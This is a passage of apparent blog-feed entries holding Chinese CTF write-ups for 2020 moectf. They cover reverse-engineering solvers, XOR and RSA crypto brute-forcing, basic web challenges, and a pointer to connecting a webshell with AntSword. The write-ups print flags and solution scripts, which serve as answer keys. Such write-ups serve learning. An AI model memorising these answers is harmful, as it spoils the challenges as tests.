alt="image-20201031001650795"></p><p>我们现在相当于是把整个程序分析差不多了,我们现在理一下程序的思路:主函数调用<code>func1(loc_401310)、func2(sub_4011B0);func2又调用fun0(sub_4012B0)、fun1(sub_401240)、fun2(sub_401270)</code>;<code>func2</code>又返回<code>sub_4012D0</code>函数。最后再跟<code>byte_4032AC</code>比较。我们现在需要弄清<code>sub_4012D0</code>函数在干什么,先试着用<code>IDA</code>分析一下:</p><p><img src="/images/2020moectf-Reverse/image-20201031003310883.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031003310883.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201031003310883"></p><p>貌似不太行……我们改动态调试:</p><p><img src="/images/2020moectf-Reverse/image-20201031010220818.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031010220818.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201031010220818"></p><p><code>F9</code>开始运行,输入<code>0123456789abcdef</code>,在断点处记录数据:</p><p><img src="/images/2020moectf-Reverse/image-20201031010436913.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031010436913.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201031010436913"></p><p>得知这个函数就是在挨个异或,每一位对应异或的内容是77,76,71,80,75,70,67,74,69,78,73,72,68,66,65。我们现在就可以写一个流程一样的程序,便于我们理解(便于写暴力,狗头.jpg</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> input[<span class="number">20</span>];</span><br><span class="line"><span class="keyword">int</span> rel[<span class="number">20</span>]={<span class="number">62</span>,<span class="number">254</span>,<span class="number">153</span>,<span class="number">118</span>,<span class="number">139</span>,<span class="number">220</span>,<span class="number">13</span>,<span class="number">24</span>,<span class="number">50</span>,<span class="number">120</span>,<span class="number">111</span>,<span class="number">191</span>,<span class="number">67</span>,<span class="number">116</span>,<span class="number">51</span>,<span class="number">115</span>};</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">fun0</span><span class="params">(<span class="keyword">int</span> x1,<span class="keyword">int</span> x2)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">input[x1] += x2;</span><br><span class="line"><span class="keyword">return</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">fun1</span><span class="params">(<span class="keyword">int</span> x1,<span class="keyword">int</span> x2)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">input[x1] ^=input[x2];</span><br><span class="line"><span class="keyword">return</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">fun2</span><span class="params">(<span class="keyword">int</span> x1,<span class="keyword">int</span> x2)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">input[x1] = <span class="built_in">abs</span>(input[x1]-input[x2]);</span><br><span class="line"><span class="keyword">return</span>;</span><br><span class="line">} </span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">func1</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">16</span>;i++)</span><br><span class="line"> {</span><br><span class="line"> input[i] = <span class="number">16</span> * (input[i] ^ <span class="number">0x16</span>) | ((input[i] ^ <span class="number">0x16</span>) >> <span class="number">4</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">func2</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">fun0(<span class="number">0</span>,<span class="number">1</span>);</span><br><span class="line">fun1(<span class="number">1</span>,<span class="number">2</span>);</span><br><span class="line">fun2(<span class="number">2</span>,<span class="number">3</span>);</span><br><span class="line">fun1(<span class="number">3</span>,<span class="number">4</span>);</span><br><span class="line">fun2(<span class="number">4</span>,<span class="number">5</span>);</span><br><span class="line">fun0(<span class="number">5</span>,<span class="number">6</span>);</span><br><span class="line">fun0(<span class="number">6</span>,<span class="number">7</span>);</span><br><span class="line">input[<span class="number">0</span>]^=<span class="number">0x4D</span>;</span><br><span class="line">input[<span class="number">1</span>]^=<span class="number">0x4C</span>;</span><br><span class="line">input[<span class="number">2</span>]^=<span class="number">0x47</span>;</span><br><span class="line">input[<span class="number">3</span>]^=<span class="number">0x50</span>;</span><br><span class="line">input[<span class="number">4</span>]^=<span class="number">0x4B</span>;</span><br><span class="line">input[<span class="number">5</span>]^=<span class="number">0x46</span>;</span><br><span class="line">input[<span class="number">6</span>]^=<span class="number">0x43</span>;</span><br><span class="line">input[<span class="number">7</span>]^=<span class="number">0x4A</span>;</span><br><span class="line">input[<span class="number">8</span>]^=<span class="number">0x45</span>;</span><br><span class="line">input[<span class="number">9</span>]^=<span class="number">0x4E</span>;</span><br><span class="line">input[<span class="number">10</span>]^=<span class="number">0x49</span>;</span><br><span class="line">input[<span class="number">11</span>]^=<span class="number">0x48</span>;</span><br><span class="line">input[<span class="number">12</span>]^=<span class="number">0x44</span>;</span><br><span class="line">input[<span class="number">13</span>]^=<span class="number">0x42</span>;</span><br><span class="line">input[<span class="number">14</span>]^=<span class="number">0x41</span>;</span><br><span class="line"> <span class="keyword">return</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="built_in">cin</span>>>input;</span><br><span class="line"> <span class="keyword">if</span>(<span class="built_in">strlen</span>(input)<<span class="number">16</span>)</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">func1();</span><br><span class="line">func2();</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">16</span>;i++)</span><br><span class="line"> <span class="keyword">if</span>(input[i]!=rel[i])</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> <span class="built_in">cout</span><<<span class="string">"you're right"</span>;</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>现在的话如果懒得逆向,你可以试试暴力,16位,你加油(狗头</p><p>我们现在逆向一下就<code>ok</code>了,没什么说的了,直接贴脚本:</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> ori[<span class="number">20</span>]={<span class="number">62</span>,<span class="number">254</span>,<span class="number">153</span>,<span class="number">118</span>,<span class="number">139</span>,<span class="number">220</span>,<span class="number">13</span>,<span class="number">24</span>,<span class="number">50</span>,<span class="number">120</span>,<span class="number">111</span>,<span class="number">191</span>,<span class="number">67</span>,<span class="number">116</span>,<span class="number">51</span>,<span class="number">115</span>};</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> input[<span class="number">20</span>];</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">ini</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">16</span>;i++)</span><br><span class="line"> input[i]=ori[i];</span><br><span class="line"><span class="keyword">return</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> ori[<span class="number">20</span>]={<span class="number">62</span>,<span class="number">254</span>,<span class="number">153</span>,<span class="number">118</span>,<span class="number">139</span>,<span class="number">220</span>,<span class="number">13</span>,<span class="number">24</span>,<span class="number">50</span>,<span class="number">120</span>,<span class="number">111</span>,<span class="number">191</span>,<span class="number">67</span>,<span class="number">116</span>,<span class="number">51</span>,<span class="number">115</span>};</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> input[<span class="number">20</span>];</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">16</span>;i++)</span><br><span class="line"> input[i]=ori[i];</span><br><span class="line"> input[<span class="number">0</span>]^=<span class="number">0x4D</span>;</span><br><span class="line">input[<span class="number">1</span>]^=<span class="number">0x4C</span>;</span><br><span class="line">input[<span class="number">2</span>]^=<span class="number">0x47</span>;</span><br><span class="line">input[<span class="number">3</span>]^=<span class="number">0x50</span>;</span><br><span class="line">input[<span class="number">4</span>]^=<span class="number">0x4B</span>;</span><br><span class="line">input[<span class="number">5</span>]^=<span class="number">0x46</span>;</span><br><span class="line">input[<span class="number">6</span>]^=<span class="number">0x43</span>;</span><br><span class="line">input[<span class="number">7</span>]^=<span class="number">0x4A</span>;</span><br><span class="line">input[<span class="number">8</span>]^=<span class="number">0x45</span>;</span><br><span class="line">input[<span class="number">9</span>]^=<span class="number">0x4E</span>;</span><br><span class="line">input[<span class="number">10</span>]^=<span class="number">0x49</span>;</span><br><span class="line">input[<span class="number">11</span>]^=<span class="number">0x48</span>;</span><br><span class="line">input[<span class="number">12</span>]^=<span class="number">0x44</span>;</span><br><span class="line">input[<span class="number">13</span>]^=<span class="number">0x42</span>;</span><br><span class="line">input[<span class="number">14</span>]^=<span class="number">0x41</span>;</span><br><span class="line">input[<span class="number">6</span>]-=<span class="number">7</span>;</span><br><span class="line">input[<span class="number">5</span>]-=<span class="number">6</span>;</span><br><span class="line">input[<span class="number">0</span>] -= <span class="number">1</span>;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">16</span>;i++)</span><br><span class="line"> ori[i]=input[i];</span><br><span class="line"></span><br><span class="line">input[<span class="number">4</span>] += input[<span class="number">5</span>];</span><br><span class="line">input[<span class="number">3</span>] ^=input[<span class="number">4</span>];</span><br><span class="line">input[<span class="number">2</span>] = input[<span class="number">3</span>]-input[<span class="number">2</span>];</span><br><span class="line">input[<span class="number">1</span>] ^=input[<span class="number">2</span>];</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> k=<span class="number">0</span>;k<<span class="number">16</span>;k++)</span><br><span class="line">{</span><br><span class="line">input[k] = (<span class="number">16</span> * input[k] | (input[k] >> <span class="number">4</span>));</span><br><span class="line">input[k] ^= <span class="number">0x16</span>;</span><br><span class="line"><span class="built_in">cout</span><<input[k];</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<<span class="string">"\n\n"</span>;</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>对了,忘记说了。<strong>如果<code>IDA</code>里面显示的是<code>unsigned char</code>,你的程序也一定要用<code>unsigned char</code>,尤其是程序中间的处理涉及位运算。</strong></p><h2 id="我没做出来的"><a href="#我没做出来的" class="headerlink" title="我没做出来的"></a>我没做出来的</h2><h3 id="GoOooO0Oo"><a href="#GoOooO0Oo" class="headerlink" title="GoOooO0Oo"></a>GoOooO0Oo</h3><h3 id="EasyAlgorithm"><a href="#EasyAlgorithm" class="headerlink" title="EasyAlgorithm"></a>EasyAlgorithm</h3><h3 id="Easy-C"><a href="#Easy-C" class="headerlink" title="Easy C++"></a>Easy C++</h3>]]></content>
<categories>
<category> CTF比赛题解 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> wp </tag>
<tag> RE </tag>
</tags>
</entry>
<entry>
<title>2020moectf Crypto</title>
<link href="2020/10/13/2020moectf-Crypto/"/>
<url>2020/10/13/2020moectf-Crypto/</url>
<content type="html"><![CDATA[<p>我的密码学是真的烂,,,唉~只能做一些简单题(数学太差</p><p><img src="/images/2020moectf-Crypto/image-20201012091130231.png" class="lazyload" data-srcset="/images/2020moectf-Crypto/image-20201012091130231.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201012091130231"></p><a id="more"></a><h2 id="我会做的"><a href="#我会做的" class="headerlink" title="我会做的"></a>我会做的</h2><h3 id="crypto入门指北"><a href="#crypto入门指北" class="headerlink" title="crypto入门指北"></a>crypto入门指北</h3><p>感谢shallow大佬送的学习资料~~</p><h3 id="Stream"><a href="#Stream" class="headerlink" title="Stream"></a>Stream</h3><p>这个题目有点毒瘤,,,先贴加密脚本</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">flag = <span class="string">"XXXXXXXXXXXXXXXXXXXXXXXXXXXX"</span></span><br><span class="line">xor = ?</span><br><span class="line">print(<span class="built_in">len</span>(xor))</span><br><span class="line">print(base64.b64encode((<span class="string">""</span>.join([<span class="built_in">chr</span>(<span class="built_in">ord</span>(i)^<span class="built_in">ord</span>(xor)) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">list</span>(flag)])).encode(<span class="string">"ASCII"</span>)))</span><br><span class="line"><span class="comment">#1</span></span><br><span class="line"><span class="comment">#b'Og9hNAFrCjU9aQ4+C2psLzxpYRE6azw+FmphPgk2EjQBDyw+DWsKIQIPHiwAaBYoOx8wNBU2aGU='</span></span><br></pre></td></tr></table></figure><p>一看xor就一位,爆破!!!</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">f = <span class="built_in">open</span>(<span class="string">"out2.txt"</span>,<span class="string">"w"</span>,encoding=<span class="string">"utf-8"</span>)</span><br><span class="line">flag = <span class="string">b'Og9hNAFrCjU9aQ4+C2psLzxpYRE6azw+FmphPgk2EjQBDyw+DWsKIQIPHiwAaBYoOx8wNBU2aGU='</span></span><br><span class="line">flag = base64.b64decode(flag)</span><br><span class="line">f.write(<span class="string">"\n————————————————开始爆破————————————————\n\n\n"</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="number">128</span>):</span><br><span class="line">f.write(<span class="built_in">str</span>(i))</span><br><span class="line">ans=<span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> flag:</span><br><span class="line">ans = ans + (<span class="built_in">chr</span>(i^j))</span><br><span class="line">f.write(ans) </span><br><span class="line">f.write(<span class="string">"\n————————————————————分割线——————————————————————\n\n"</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>但为什么我觉得这个题目有点毒瘤,,,因为它解出来不是flag,而是flag的base64……最早真的没有想到这一点</p><p><img src="/images/2020moectf-Crypto/image-20201012093208401.png" class="lazyload" data-srcset="/images/2020moectf-Crypto/image-20201012093208401.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201012093208401"></p><blockquote><p>moectf{U_Kn0w_How_7o_Break_Stream_Ciphe2}</p></blockquote><h3 id="easycrypto"><a href="#easycrypto" class="headerlink" title="easycrypto"></a>easycrypto</h3><p>直接暴力搞:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> FLAG <span class="keyword">import</span> flag</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">enc</span>(<span class="params">plain</span>):</span></span><br><span class="line"> cipher = []</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> plain:</span><br><span class="line"> m = <span class="built_in">ord</span>(i)</span><br><span class="line"> cipher.append(<span class="number">5</span> * m ** <span class="number">2</span> + <span class="number">6</span> * m - <span class="number">8</span>)</span><br><span class="line"> <span class="keyword">return</span> cipher</span><br><span class="line"></span><br><span class="line">print(enc(flag))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#[60051, 62263, 51603, 49591, 67968, 52624, 76375, 38359, 51603, 58960, 49591, 62263, 60051, 51603, 45687, 67968, 62263, 45687, 22839, 65656, 73923, 63384, 67968, 62263, 78867]</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">cnt=<span class="number">1</span></span><br><span class="line">flag_en=[<span class="number">60051</span>, <span class="number">62263</span>, <span class="number">51603</span>, <span class="number">49591</span>, <span class="number">67968</span>, <span class="number">52624</span>, <span class="number">76375</span>, <span class="number">38359</span>, <span class="number">51603</span>, <span class="number">58960</span>, <span class="number">49591</span>, <span class="number">62263</span>, <span class="number">60051</span>, <span class="number">51603</span>, <span class="number">45687</span>, <span class="number">67968</span>, <span class="number">62263</span>, <span class="number">45687</span>, <span class="number">22839</span>, <span class="number">65656</span>, <span class="number">73923</span>, <span class="number">63384</span>, <span class="number">67968</span>, <span class="number">62263</span>, <span class="number">78867</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> flag_en:</span><br><span class="line">cnt+=<span class="number">1</span></span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">48</span>,<span class="number">130</span>):</span><br><span class="line"><span class="keyword">if</span>(<span class="number">5</span>*j**<span class="number">2</span>+<span class="number">6</span>*j-<span class="number">8</span>==i):</span><br><span class="line">print(<span class="built_in">chr</span>(j),end=<span class="string">''</span>)</span><br><span class="line"><span class="comment">#moectf{Welcome_to_Crypto}</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="rsa-begin"><a href="#rsa-begin" class="headerlink" title="rsa_begin"></a>rsa_begin</h3><p>毕竟是第一题,工具直接搞就完了,贴一篇<a href="https://www.jianshu.com/p/c945b0f0de0a">工具教程</a>,直接一把梭。</p><p><img src="/images/2020moectf-Crypto/image-20201012095243683.png" class="lazyload" data-srcset="/images/2020moectf-Crypto/image-20201012095243683.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201012095243683"></p><blockquote><p>moectf{Ull_f1nd_RSA_1s_1nte2est1ng}</p></blockquote><h2 id="我没做出来的"><a href="#我没做出来的" class="headerlink" title="我没做出来的"></a>我没做出来的</h2><p>静等官方wp</p>]]></content>
<categories>
<category> CTF比赛题解 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> wp </tag>
<tag> Crypto </tag>
</tags>
</entry>
<entry>
<title>2020moectf Web</title>
<link href="2020/10/13/2020moectf-Web/"/>
<url>2020/10/13/2020moectf-Web/</url>
<content type="html"><![CDATA[<p>作为一个二进制手……我把web强行做完,我太难了……</p><a id="more"></a><h2 id="GET"><a href="#GET" class="headerlink" title="GET"></a>GET</h2><p><img src="/images/2020moectf-Web/image-20201012095628380.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012095628380.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201012095628380"></p><h2 id="POST"><a href="#POST" class="headerlink" title="POST"></a>POST</h2><p><img src="/images/2020moectf-Web/image-20201012095732293.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012095732293.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201012095732293"></p><h2 id="小饼干"><a href="#小饼干" class="headerlink" title="小饼干"></a>小饼干</h2><p>小饼干?cookie!</p><p><img src="/images/2020moectf-Web/image-20201012095851718.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012095851718.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201012095851718"></p><p>url解码:</p><blockquote><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">moectf{y0u_c4n't_e4t_thi3_c00k1e}</span><br></pre></td></tr></table></figure></blockquote><h2 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h2><img src="/images/2020moectf-Web/image-20201012100120336.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012100120336.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201012100120336" style="zoom:67%;"><p>进入网页,Ctrl+U看源码,Ctrl+F搜索</p><p><img src="/images/2020moectf-Web/image-20201012100209487.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012100209487.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201012100209487"></p><p><img src="/images/2020moectf-Web/image-20201012100245521.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012100245521.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201012100245521"></p><h2 id="一句话"><a href="#一句话" class="headerlink" title="一句话"></a>一句话</h2><p>一句话木马还是一个比较常见的考点, 现在直接AntSword或者Cknife一把梭,建议<a href="https://blog.csdn.net/weixin_41924764/article/details/108099952">AntSword</a>,,,</p><p><img src="/images/2020moectf-Web/image-20201012213313189.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012213313189.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201012213313189"></p><p><img src="/images/2020moectf-Web/image-20201012213344797.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012213344797.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" 